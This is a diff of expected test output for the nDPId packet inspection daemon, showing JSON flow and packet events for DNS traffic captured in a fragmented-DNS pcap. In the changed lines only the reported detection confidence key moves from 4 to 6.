00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1560869913751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":134,"pkt_l4_len":80,"thread_ts_msec":1560869913751,"pkt":"AAwpfKTLCFsOoYNeht1gDizvAFARPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXshgBQyy0\/f4GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAHADAAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTAAApBawAAAAAAAA="} -00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} +00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="} -00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1560869916459,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869916459,"pkt":"CFsOoYNeAAwpfKTLht1gAxE1ADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER1T4ANQA07tzo3wEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAEAACkCAAAAAAAAAA=="} -00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1560869916473,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":122,"pkt_l4_len":68,"thread_ts_msec":1560869916473,"pkt":"AAwpfKTLCFsOoYNeht1gCEAKAEQRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXVPgBEGsro34GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAHADAABAAEAAA4QAATC9wUOAAApBawAAAAAAAA="} -00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}} +00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 